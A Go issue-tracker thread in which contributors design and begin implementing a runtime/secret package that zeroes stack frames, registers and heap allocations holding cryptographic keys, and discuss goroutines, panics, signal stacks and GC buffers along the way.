I think this issue is wanting for some real-world examples of how this would work, so we could see if this would be sufficient. Getting secret args in and secret results out really affects the design.

Completely agree with this. @zx2c4 in the code you posted above, what protects longTerm.something? Also, it seems like secret mode would be fooled by sync.Pools. Any code using a sync.Pool might reuse a buffer instead of allocating a new one. The reused buffer will not be marked secret even though a freshly allocated one would.

This all still feels a lot like "magic happens here" as far as the boundaries and how we transition.

What if instead we had a global setting that you can turn on but never turn off that just forces every GC'ed block to be zeroed immediately, and all stack frames to be zeroed at return? That will run slower but at least we understand it. And we couldn't possibly be more secure than that.

Comment From: astrolox

A secure mode which is turned on and never off is an interesting idea. I image that would lead to a pattern of using two processes; e.g. one process with secure mode on and a main process with secure mode off for performance. If that's the way we would want to go then I would suggest it should be a compile time option.

Comment From: danderson

[I'm going to call the new runtime mode "secure mode" here, and the values "secure values", even though it's likely a misleading name that needs more bikeshedding. Please don't read into it any more semantic meaning than exactly what @zx2c4 defined above.]

I believe Jason provided some sample implementations further up, showing what a Noise handshake would look like under his proposal. As it happens, I've just finished implementing a noise.Conn, and can confirm that the patch to implement secure zeroing would match his example precisely.

Once that example handshake code has returned and left secure mode, it is the programmer's responsibility to handle the remaining session keys (which were allocated in secure mode) with care. That is, operations on those keys that may leak key data into memory should also be run in secure mode. Said like that, this sounds onerous, and it's tempting to wander into open-ended compiler research to figure out full taint tracking.

However, in practice, those session keys are used in few, well-known places: routines for encryption, decryption, key rotation, and teardown. Making those routines also run in secure mode resolves the practical issues of handling the keys securely.

If you do all this, and also adopt an API style like that of crypto/tls, all these potentially risky uses of the keys are encapsulated in a net.Conn. The caller gets an object that securely handles key material and forward secrecy, without exposing any footguns. The implementers of crypto/tls still need to be careful when implementing TLS, but that's always been the case. Go already makes powerful-but-fragile constructs available to such programmers, via crypto/subtle.

Can you still use these constructs incorrectly, and expose key data? Yes, just like you can use subtle.ConstantTimeByteEq wrong and introduce a timing side-channel in your implementation. I don't think the expectation should be that every Go programmer will have to use secure mode to have nice things. People implementing packages like crypto/tls need it, but can use it to present a safe, non-sharp API to callers.

I think this conversation has determined that we can't have a foolproof zero-on-gc implementation that everyone could use without thinking, because of gotchas like goroutines and sync.Pool. AFAICT, the conversation has gone from there to conclude that we must do nothing instead.

I'd advocate for the alternative: explicitly declare this API to be subtle, and document its sharp edges. Specifically:

Place it in crypto/subtle, to further reinforce that it's a sharp knife for use in crypto code, not a generic and friendly memory management mechanism.
Document the semantics as specified by @zx2c4 in https://github.com/golang/go/issues/21865#issuecomment-885258028 . In particular, both stack and heap values created in secure mode are securely erased, either at the exit of secure mode (for stack values) or at GC time (for heap values).
Call it something less enticing than "secure mode", a name that conveys exactly the one thing the API guarantees, which is zeroing of memory at a particular point in the lifecycle, and nothing else.
Decline to handle the edge cases, but document them:
In general: heap values that originated from secure mode do not carry any aura or taint, their only special behavior is being zero'd on GC. If you want the secure-ness to propagate, it is your responsibility to enter secure mode as needed.
Only heap-allocated values can remain secure after leaving secure mode. Returning an int from your secure-mode function does not result in the caller having a secure value, but returning a *int (or []byte, or...) does.
In particular: goroutines created while in secure mode do not inherit secure mode. It is the programmer's responsibility to propagate secure mode if they need to (add a 2-line prologue to the goroutine func).
In particular: mixing secure and insecure buffers in a sync.Pool means you may or may not get a secure buffer out of the pool. Don't do that if you care about getting secure memory out of the pool.
In particular: you are free to copy(insecureSlice, myPreciousKeys), or otherwise write code that leaks the secure bytes into insecure memory. Don't do that, enter secure mode if you need to securely propagate state from the secure memory.
Revise the existing crypto and x/crypto implementations such that, if they are handed slices of secure memory, they will internally preserve that secureness by entering/exiting secure mode appropriately.
If you don't care about forward secrecy in your personal threat model, you are still welcome to pass insecure memory to those APIs. If you do, they will not magically fix your lack of forward secrecy, but won't make anything worse either.
If you are implementing a higher-level cryptographic protocol (e.g. Noise, TLS), you can use the robust and performant implementations from crypto and x/crypto, because they preserve the properties of secure mode if handed secure secret values.

This API enables implementers such as crypto/tls and wireguard-go to provide stronger guarantees around forward secrecy, and enables the construction of APIs that do not expose the subtleties and limitations of secure mode to their callers. As it happens, such APIs are also reasonably good practice for crypto code anyway.

Comment From: danderson

I forgot one addendum: a process-wide "secure mode all the time for everything" was already discussed up-thread, and the response from folks doing crypto in Go is that it would result in unacceptable performance degradation. I concur with that looking at it from the POV of Tailscale: of the gigabytes of garbage we generate, only a very few bytes need special handling. Making the entire program run worse is a disproportionate cost to pay for forward secrecy, and given that choice, I'd expect ~everyone to give up on forward secrecy (or Go, in the extreme) instead.

Comment From: randall77

I believe Jason provided some sample implementations further up, showing what a Noise handshake would look like under his proposal.

Could you provide a link? Searching for "Jason" or "Noise" in this issue doesn't turn up anything.

Comment From: danderson

I was referring to:

https://github.com/golang/go/issues/21865#issuecomment-857763995 https://github.com/golang/go/issues/21865#issuecomment-857787486

If a real-world sample on a Real(tm) Noise implementation would help, I have a PR in flight that implements a noise.Conn, and would be happy to adapt it (with no-op calls, obviously) to demonstrate what a real implementation would look like, if that helps.

Comment From: rsc

OK, so given Keith's comment about the problem with pop zeroing, it sounds like a closure-based interface would work, like

subtle.KeepSecret(f func())

This function would mark any allocations during f as "must be zeroed as soon as the GC notices they are free", and it would also make sure that any stack frames allocated and deallocated during f are zeroed. "As soon as the GC notices they are free" is a bit imprecise, since maybe the GC will take more time than one might expect to notice. But we can do the best we can.

This is analogous to a hardware enclave, but we should probably avoid that word since it's not actually one.

Do I have that right? Is that a good enough API, @danderson and @zx2c4? Is that implementable, @randall77 and @aclements?

Comment From: randall77

I think so. We'd have to figure out exactly how to do it if f panics, but I suspect it is doable.

Speaking of which, should subtle.KeepSecret do anything nonstandard if f panics (recover the panic, return it as a result, or some such)?

Comment From: aclements

Is KeepSecret too broad of a name? Do we want a name that more precisely indicates this is about zeroing memory and nothing else? You drew a parallel with hardware enclaves, but enclaves are dramatically more isolated than this. (Coincidentally, in today's brainstorming meeting we talked about the possibility of actually putting part of a Go program in an enclave.)

We'd have to figure out exactly how to do it if f panics, but I suspect it is doable.

I think this isn't too bad, though you're right that we have to be careful about this. If the panic is recovered by a defer outside the secret boundary, then I think we have to zero the stack when unwinding to the recovered frame. What we do if the panic is recovered by a defer inside the secret boundary depends on how aggressive we are about zeroing frames on return. If the panic isn't recovered, then the whole process is about to exit, so I don't think that case matters, though we could zero the whole stack.

runtime.Goexit is a related problem, but I think we just have to zero below wherever the secret boundary is before releasing the goroutine's stack.

Comment From: danderson

I believe subtle.KeepSecret(f) would work for implementing proper key erasure, yes. I'll let @zx2c4 speak to the needs of wireguard-go, but for my Noise implementation, I think I can protect everything that matters with that API.

Comment From: rsc

ping @zx2c4: is KeepSecret(f) good enough for WireGuard?

(We'll still have to figure out the right name but let's worry about the semantics for now.)

Comment From: zx2c4

@danderson

Revise the existing crypto and x/crypto implementations such that, if they are handed slices of secure memory, they will internally preserve that secureness by entering/exiting secure mode appropriately.

While most of your summary seemed right on, this seemed to stray from the general idea. Namely, crypto and x/crypto can do whatever they want, and if you want to call them using secrets, then you make sure to call them from a KeepSecret block. That way crypto and x/crypto and whatever else (say, a base64 encoder) do not need to be modified. Just the top level call sites.

Comment From: zx2c4

As I mentioned in #21865 (comment) , just having {Push/Pop}SecretMode is problematic because we can't reasonably zero the current stack frame on a PopSecretMode.

I think we'd need something like:

func RunUnderSecretMode(f func())

Which does a PushSecretMode-y thing on entry to f and a PopSecretMode-y thing on exit from f (including a panic exit, I guess, although it is less clear how to do that cleanly, unless we squash the panic).

Yea, sure, that'd make sense and fits the bill well. I like the idea of using a closure for this.

Comment From: zx2c4

In particular: goroutines created while in secure mode do not inherit secure mode. It is the programmer's responsibility to propagate secure mode if they need to (add a 2-line prologue to the goroutine func).

Why not? This is one of the things I brought up very early on in this discussion under the rubric of "we have to make a decision about this." If we're going the closure approach, I suspect that Go routines should inherit the mode, since they're generally children in some way of the closure. There are two options:

make go routines inherit secret mode from their parent.
provide an .IsRunningUnderSecretMode() bool function so you can check manually whether you're going to want to propagate it.

1 seems simpler. But 2 could also work.

Regardless of what we choose for Go routines, 2 might be a good idea anyway, so that people trying to protect outer scopes can do assertions on key inner scope functions:

func doSomeWork(workLimit int) {
    subtle.DoUnderSecretMode(func() {
        for i := 0; i < workLimit; ++i {
            work := dequeueWorkItem()
            if work == nil {
                break
            }
            processWork(work)
        }
    })
}

func processWork(work workItem) {
    doSensitiveCryptoThing(work)
    doOtherStuff(work)
    doSensitiveCryptoThing(work)
}

func doSensitiveCryptoThing(work workItem) {
    if !subtle.IsUnderSecretMode() {
        panic("we weren't supposed to get here")
    }
    // do some crypto stuff
}

Comment From: FiloSottile

If secret mode is nestable, why not just enter it rather than checking? It would probably make the code simpler too.

I agree that the standard library should not be entering secret mode itself, but should just work well within it.

Propagating to goroutines feels weird to me. It makes it harder to reason about what is in secret mode, and anyway secrets will need to be passed to the child goroutines somehow, and there is nothing ensuring they are only passed to child or secure goroutines. Anyway, no crypto libraries spawn goroutines, so it doesn’t feel necessary.

Comment From: danderson

@danderson

Revise the existing crypto and x/crypto implementations such that, if they are handed slices of secure memory, they will internally preserve that secureness by entering/exiting secure mode appropriately.

While most of your summary seemed right on, this seemed to stray from the general idea. Namely, crypto and x/crypto can do whatever they want, and if you want to call them using secrets, then you make sure to call them from a KeepSecret block. That way crypto and x/crypto and whatever else (say, a base64 encoder) do not need to be modified. Just the top level call sites.

That does lead to a mild subtlety: the entire use of an API must be shrouded in KeepSecret, not just individual calls that receive secret values. Otherwise, you could have a New() function that allocates some buffer memory, and a later Encrypt(secretThing) that copies secretThing into the preallocated buffer - which itself is not covered by KeepSecret. That's an extension of the "don't copy(insecure, secure)" rule, but because the copy would be hidden behind an API surface, it's not as obvious as writing the copy() yourself.

My attempt to blunt that edge slightly was to say that that, for those well-known libraries, if you KeepSecret only the specific API calls that receive secret data, that's sufficient to preserve the secrecy of the data, and the crypto packages promise to not do things like what I described above. As you say, we can also just state "you must know exactly how the libraries you call are implemented to know how to safely wield them with KeepSecret."

Comment From: danderson

In particular: goroutines created while in secure mode do not inherit secure mode. It is the programmer's responsibility to propagate secure mode if they need to (add a 2-line prologue to the goroutine func).

Why not? This is one of the things I brought up very early on in this discussion under the rubric of "we have to make a decision about this."

I should have clarified that this was just a proposal for which semantics to document, and should have separated that from the proposal to not try and de-sharpen KeepSecret. Sorry about that.

I personally tend towards not propagating secrecy between goroutines, because that requires less mental context for a future reader of the code. If I read the entrypoint code of a goroutine, how do I figure out if it's handling secret things safely?

If goroutines inherit secrecy, I have to find every go callsite that spawns this function, then work out whether all possible execution paths leading to those go calls correctly KeepSecret. If so (and if I didn't miss anything), then that function can safely manipulate secret values. Or you defensively wrap the goroutine's code in subtle.KeepSecret anyway, just so that you're not bound by the secrecy decision your spawning code made (or didn't).

If goroutines don't inherit secrecy, then there's no external context to track: if the goroutine entrypoint wraps itself in subtle.KeepSecret, then that code is protected. If not, it's not. There's no need to inspect how the goroutine is spawned, or any question about whether your goroutine code should subtle.KeepSecret itself.

For my own uses, I'd be fine with either behavior, because in practice I'd still end up writing code as if goroutines don't propagate secrecy, just for my own sanity in keeping track of where secret mode is enabled.

How would this decision (either way) impact the code of, say, wireguard-go? Are you thinking of this in the context of its encryption/decryption goroutines, or some other goroutine-wielding crypto code?

Comment From: rsc

We don't want implicit state, so goroutines can't "inherit" secrecy. They also may keep running after the main function returns, which is another complication.

It does seem like maybe we should have a way for people to ask whether "secret mode" is enabled right now, for purposes like creating goroutines and assertions.

I'd be interested to see @zx2c4's answer to:

How would this decision (either way) impact the code of, say, wireguard-go? Are you thinking of this in the context of its encryption/decryption goroutines, or some other goroutine-wielding crypto code?

Comment From: zx2c4

We don't want implicit state, so goroutines can't "inherit" secrecy. They also may keep running after the main function returns, which is another complication.

So ixnay on inheritance. Ack.

It does seem like maybe we should have a way for people to ask whether "secret mode" is enabled right now, for purposes like creating goroutines and assertions.

Agreed. Trivial to do too, and people (or, uh, me, I guess) will wind up resorting to unsafe hacks to expose the current state anyway. It's just a function that returns a boolean. Go doesn't (currently) have any way of referencing an executing Go routine other than one's own, so implementing that shouldn't incur any complications or races.

How would this decision (either way) impact the code of, say, wireguard-go? Are you thinking of this in the context of its encryption/decryption goroutines, or some other goroutine-wielding crypto code?

crypto.Rand() will be done from secret mode, as well as everything that's derived from that that should remain secret (e.g. ephemerals, session keys). When the GC cleans up old random buffers, ephemerals, and session keys, it will zero them, since they were created when secret mode was enabled. The encrypt/decrypt routines that later touch the session keys will be done from secret mode too. If entering and exiting secret mode is mostly free from a performance perspective, secret mode will be entered and exited for every packet; otherwise it will be done whenever a dequeue operation is about to block. Non-secret mode code will pass around references (pointers) to secret mode-allocated data, but will never dereference it. Depending on how much auditing it hurts my brain, dereferences will be wrapped in an secret mode assertion checking accessor, but if I can keep the code clean enough, then I might skip that. This, anyway, is the rough idea, which might change when I get coding.

Comment From: tv42

Being able to use memfd_secret in the future sounds like a useful requirement to consider. https://lwn.net/Articles/865256/

Comment From: rsc

@tv42 thanks for the pointer. I don't quite see how we can use it for things like stacks during secret mode, but I guess a sufficiently complicated GC could arrange for secret allocations to happen there. It doesn't sound like we need to do that in the first implementation, but it also doesn't seem impossible to do later.

Comment From: rsc

OK, so it sounds like we understand the semantics. As far as naming, it sounds like something like

package subtle // import "runtime/subtle"

func DoSecret(f func())
func InSecret() bool

Comment From: cespare

Should this really use the same package name as crypto/subtle?

Comment From: danderson

I think I might have suggested the name subtle because I was proposing to put it in crypto/subtle, to inherit the existing warnings that only people writing low-ish level cryptography should be considering it, and that it's easy to hold it wrong if you're not careful.

If this has to live in runtime for other reasons (like having behavior tied deeply into the runtime :) ), IMO it'd be fine to have it just live looseleaf in runtime, and explain its subtlety in the docstrings.

Comment From: FiloSottile

runtime/subtle is likely to end up having to be imported int eh same files that import crypto/subtle, which would be a fairly annoying clash.

Comment From: rsc

Are there secrets other than crypto? Should we use crypto/subtle instead of runtime/subtle?

Or we could have runtime/secret, with "In" and "Do".

Comment From: rsc

FWIW, we seem to be converging but there's so much else in Go 1.18 that this seems likely not to happen ~~in~~ until Go 1.19.

Comment From: elagergren-spideroak

that this seems likely not to happen in Go 1.19.

@rsc sorry, just to clarify: do you mean it won't happen until Go 1.19?

Comment From: vparla

Are there secrets other than crypto? Should we use crypto/subtle instead of runtime/subtle?

Or we could have runtime/secret, with "In" and "Do".

Yes, there are secrets / sensitive information that are not related to cryptography functions. For example I might store PII information in a variable and want to securely erase it when done with it.

Comment From: danderson

No strong opinions on whether to telegraph that the API is crypto-only, or general purpose. It'll require care to use correctly either way, so it comes down to how big of an audience needs to be warned and educated.

Cryptographic key material is uniquely well suited to this problem, because of the needs of perfect forward secrecy. Other use cases have a less clear threat model for strictly bounding data lifetime in RAM, but with enough additional application design and a lot of bespoke code, you could use this as one facet of a strict data encryption at rest story (e.g. only decrypt user data when specifically handling it, and have some reasonable bounds on prompt erasure from working memory once the handling is complete). I personally don't expect many such uses to arise compared to crypto secret handling use cases, but it's not impossible.

Comment From: rsc

OK, so it sounds like maybe a separate runtime/secret package is best. It can have a long doc comment explaining what it does and does not do, and we don't have the problem of 'subtle' being a catch-all that will attract other things.

So is this the API?

package secret

func Do(f func())
func Enabled() bool

Comment From: danderson

That API SGTM for my own uses.

To summarize the semantics that I think this thread agreed on:

secret.Do(f) zeros all stack frames that were created during the execution of f before secret.Do returns.
secret.Do(f) marks any heap allocations made during the execution of f as needing to be zeroed explicitly when collected by the GC. This marking applies to the entire call graph of f, so f can call alloc-ful helper functions and those allocs inherit the zeroing property.
secret.Do calls can be nested (implication being that the runtime has to track the current "depth" of secret mode to implement the semantics correctly).
secret.Do(f) does not propagate its properties to goroutines created by f's call graph. It is the programmer's responsibility to run secret.Do again as needed from new goroutines.
During secret.Do(f), if f panics or calls runtime.GoExit, the runtime enforces properties 1&2 as if secret.Do(f) had returned normally.
It is the programmer's responsibility to ensure that heap bytes created in secret mode are not copied to non-secret heap bytes. IOW, things like copy(notSecret, secret) and *notSecret = *secret have no new behavior.
secret.Enabled() reports whether secret.Do appears anywhere in the current call stack.

While writing the above, a few other edge cases to consider: - If a panic is uncaught and causes the program to terminate, do all currently existing secret stack frames and heap allocations get zeroed before the program exits to the OS? - What about if a goroutine calls os.Exit while secret stack/heap values exist? - What about unix.Exec ?

These all boil down to the same question: when the program ceases to exist entirely, does the secrecy of the memory become the OS's problem, or does the runtime need to try and clean up on the way out?

Comment From: rsc

Re the edge cases, no, none of those clear the memory. If the program is kill -9'ed, the memory is not cleaned up either, nor can it. It seems like if you've got that problem, the others don't add to it.

At least for the uncaught panic you can put a defer/recover above your secret.Do.

os.Exit has always been just the syscall, not any kind of atexit work. Same with syscall.Exec.

Comment From: rsc

This seems like a likely accept, but not for Go 1.18 (enough still to land there).

Comment From: rsc

Based on the discussion above, this proposal seems like a likely accept. — rsc for the proposal review group

Comment From: awnumar

Apologies if i've missed previous context on this: why are stack frames zeroed before secret.Do returns whereas heap allocations are only marked to be zeroed at some unspecified future time when the GC runs?

Comment From: danderson

It's a compromise between what we want for security-critical code, and what promises a GC'd language can offer. Liveness for heap values is determined by the GC, so the soonest we can safely implicitly zero a value is when the GC determines it's no longer used.

For values you control directly, you can zero them explicitly at the time of your choosing, but operating on that memory might have created other heap values (e.g. in standard library functions that handled your bytes), which you can't access explicitly and can't be implicitly altered while they're alive. So, GC is the soonest those "derived" values can be cleared.

OTOH, the stack is managed inline by function entry/exit code snippets, so function exit is the obvious candidate for the place where a stack frame can safely be zeroed. And since the transition we care about most is from secret mode to non-secret mode, the spec only promises stack zeroing there, to give the implementation as much freedom as possible.

This doesn't provide guarantees as strong as runtime models like refcounted memory, but it still provides a good upgrade of guarantees for perfect forward secrecy: before, we had no guarantee at all that dead sensitive memory would be cleaned up. With this the runtime promises that, if the GC is running periodically, the lifetime of sensitive values won't be "much longer than needed".

Comment From: rsc

No change in consensus, so accepted. 🎉 This issue now tracks the work of implementing the proposal. — rsc for the proposal review group

Comment From: DmitriyMV

So this was accepted, but no work was done (since most of the effort is currently focused on (runtime/generics/compiler). Is it still planned to be done at some time in the future?

Comment From: robaho

I don’t understand the concern here. You cannot read another processed memory without root access. If you have root access you can compromise the security of the entire server - including replacing the crypto libraries with compromised versions.

Comment From: nfisher

@robaho not my forte but my understanding is that it’s to protect things like the key which is only required briefly and remove/zero it from memory as quickly as possible. I assume this would minimise damage by things like spectre attacks as well as more traditional buffer overruns. Commenting mostly to see if my understanding is correct.

Comment From: FiloSottile

I don’t understand the concern here. You cannot read another processed memory without root access. If you have root access you can compromise the security of the entire server - including replacing the crypto libraries with compromised versions.

The most compelling scenario here is a long-running process that is concerned with forward secrecy. If you have a Wireguard server that's been running for a year, and it gets compromised today, the protocol is designed such that it won't be possible to decrypt the past year of recorded traffic. However, if the ephemeral keys are still in memory, that property is lost.

crypto/tls also uses ephemeral key exchanges and rotates session ticket keys for the same reason, but its forward secrecy properties are also weakened by the risk of having old key material remain in memory.

Comment From: robaho

Hmm. That sounds suspect to me. If that machine is compromised at a later date, it is easier to install compromised libraries and use that to access the future - and past - data that any user accessing that server has access to. If the server has ephemeral keys in memory that are of any use then the sever is acting as a “free text” gateway and compromising a free text gateway is a critical security failure.

Comment From: FiloSottile

Forward secrecy is a widely desired, studied, and implemented property of cryptographic protocols, and such protocols should be safe to implement in Go. We are not re-debating whether forward secrecy has a reason to exist. I suggest looking up the literature on the matter.

Comment From: robaho

You did not refute my point. If the system is compromised so that arbitrary processes can read the memory of another there are far easier ways to steal the keys. This is a red herring initiative that will do next to nothing to secure the system.

Comment From: elagergren-spideroak

@robaho Standards (like Common Criteria) require wiping key material from memory. It's currently ~impossible to do that in Go with any sort of assurance that the key material has indeed been overwritten.

At any rate, this proposal has been accepted so it's very unlikely to be un-accepted.

Comment From: astrolox

@robaho

It depends on the nature of how the system is compromised. Sure, if someone has full control of the server I probably have bigger concerns, but maybe they don't have that. I don't know what possible vulnerabilities may show up in the future that allows people to read the memory of process (without fully compromising my system).

I do know that I store all secrets encrypted, and would like to be able to treat the memory where the decryption keys are stored a little differently from just regular memory. Things like preventing it from being written to swap, or securely erasing it after its final use, can only benefit us.

As an aside. I know this isn't being actively worked on right now. I keep thinking I might jump in and work on a PR, but never get the time. Would be happy to assist anyone who is thinking about working on this.

Comment From: FiloSottile

Folks, the Go issue tracker, and especially an approved proposal with a large number of subscribers, is not the forum to debate the general worthiness of secret erasure or forward secrecy. I actually am skeptical myself of the value of zeroing out long-term secrets, but ephemeral secrets in forward-secure protocols are a clear, established, and compellingly sufficient use case for this design.

I'm marking this sub-thread as off-topic, including my own comment, nothing personal, I just want to make sure it doesn't devolve into a long debate.

Comment From: robaho

I only brought it up because it seems eerily similar to https://github.com/golang/go/issues/20654 which after 5 years ends up removing its need.

There are existing alternative implementations of this proposal that do not require a language change (e.g keep all key/cryptography outside of the runtime).

Comment From: sjaconette-google

This has come up recently for me related to coredumps. It's valuable to be able to ensure that a coredump does not contain sensitive key material, in case it is later accessed by a wider set of people or processes than had access to the process that generated the dump. IMO having the ability to automatically zero out memory that contained keys would be extremely useful. See https://www.cybersecuritydive.com/news/microsoft-crash-dump-cabinet-email-hacks/692995/ for a recent example of a real compromise that resulted from key material ending up in a coredump.

Comment From: tv42

@sjaconette-google Your use of the word "ensure" is tricky here. Just clearing secrets after use does not give you "ensure". Zeroing memory is purely for decreasing the risk, and cannot eliminate it.

If the process dies with a signal that causes a core dump, it's too late for the process itself to do anything about the memory contents. The purpose of zeroing secrets after use is to minimize the window in which the secrets might leak into a core file, but it can't prevent that.

As I said before, for any absolute guarantees, you probably want memfd_secret (https://lwn.net/Articles/865256/).

Comment From: gopherbot

Change https://go.dev/cl/600635 mentions this issue: runtime/secret: implement new secret package

Comment From: randall77

Question about secret.Do behavior. Which registers do we need to clear, exactly? I think there are 2 options:

Clear all registers that Go compiler might use
Clear all registers the architecture has

1 seems more straightforward, but I'm not sure it covers enough. 2 seems doable, but it could be a lot of registers. For instance, do we have to clear all the AVX512 registers? I could imagine that we could declare that assembly must clear such registers if it uses them. secret.Do would only clear registers that might be used by Go code.

By "used by Go code" we would have to include things like uses in internal/bytealg and any other runtime-implicit assembly.

Comment From: ianlancetaylor

The goal of this function is to make things as safe as possible at the cost of some efficiency. Therefore I think we should aim to clear all registers.

Comment From: randall77

So I've made some progress on this in CL 600635. But I've also discovered some really thorny issues that make it look to me a lot harder than I originally thought.

Signals. When a signal comes in and interrupts a secret.Do invocation, it writes the contents of all the registers to the signal stack. Our signal handler can detect that, but it isn't easy to fix. We can't just erase that memory in the signal handler, because then on return from the signal handler that erased memory will get restored to registers and corrupt the register state. So we have to somehow keep track of which signal stacks have secrets in them so we can erase them at some later time. Erasing signal stacks is tricky, because they are signal stacks and could get used at any time to handle a signal. So erasing probably involves blocking signals on the affected Ms, doing the erasing, and restoring. This could be doable, but it is very finicky, os-specific code.
Write barriers, and GC more generally. When secret code is running, we might need to record some pointers in write barriers, and then flush those pointers on to the general GC buffers for use in heap marking. Those pointers could be secret in various ways (e.g. using a byte of a secret to compute a location in a table). But as soon as pointers hit the write barrier buffer we've lost the association of the pointer to the G that sourced it, and thus its secretness, so it is hard to know what needs to be zeroed afterwards. Every GC thread that processes GC buffers might load a bunch of those secret pointers into registers, and those GC threads aren't marked in any way as processing secrets. Those threads might then get interrupted (see point 1), call into C code with those registers uncleared, etc.
Other. There is at least a 3rd mechanism where secrets are escaping my best efforts at containment, using the tests in my CL. I'm not yet sure how that is happening, but it isn't obvious.

For point 2, maybe there is some scope to say "pointers aren't secret" in some way that is still useful. For instance, the obvious ways that a secret could be encoded in a pointer also lead to timing attacks, so maybe crypto code wouldn't do such things anyway? It seems challenging to figure out how to say such a statement in a spec, though, and part of the point of secret.Do is that its semantics are simple.

I've reached the point where I think I can safely say that this is going to require a lot more engineering work than me hacking on it for a few days. So I'm going to pause for now and hope maybe some ideas can be found to drag this proposal back into feasible territory.

If anyone knows of other languages/frameworks/etc. that implement this feature, I'd be really interested to know how they did it. The signal problem seems pretty universal across languages, and the pointer/GC problem seems pretty universal across garbage-collected languages.

Comment From: gopherbot

Change https://go.dev/cl/704615 mentions this issue: runtime/secret: implement new secret package

Comment From: DanielMorsing

I've done a bit of thinking and I might have a solution to the signal stack clearing problem. Paradoxically, it involves copying the secret state into another bit of memory.

On linux amd64 and arm64 (and I suspect many other platforms but I have not tested on them yet), there is no requirement that the sigreturn system call is executed on the signal stack registered with the kernel. During secret mode, we can allocate a shadow signal stack and use that to return. Once we get a signal, we can copy the state out of the registered stack, erase it, switch to our shadow stack for the return and execute sigreturn, leaving a pristine signal stack. When exiting secret mode, we can erase the shadow stack without getting in the way of any other signal delivery.

I have a template for this scheme at CL704615, based on the work that Keith did last year (many thanks! it's been massively helpful). I still need to do performance testing and polish it into something more usable.

As for pointers leaking into the GC buffers, I think it is highly unlikely that anything can be gleaned from pointer offsets. The crypto code avoids it religiously (because of constant time requirements) and the other big use that I see for this feature (grab API key from secret store, establish authenticated connection with external API, throw away API key) doesn't encode anything confidential into pointer offsets. That does leave the unenviable task of defining what exactly the confidentiality boundary is, but that's doable.

Comment From: DanielMorsing

I think I found the culprit for the leaks that Keith were seeing. It was the kernel spilling onto the g0 stack when calling vDSOs. With the signal stack change and erasing registers when entering vDSOs, I have yet to make the tests fail.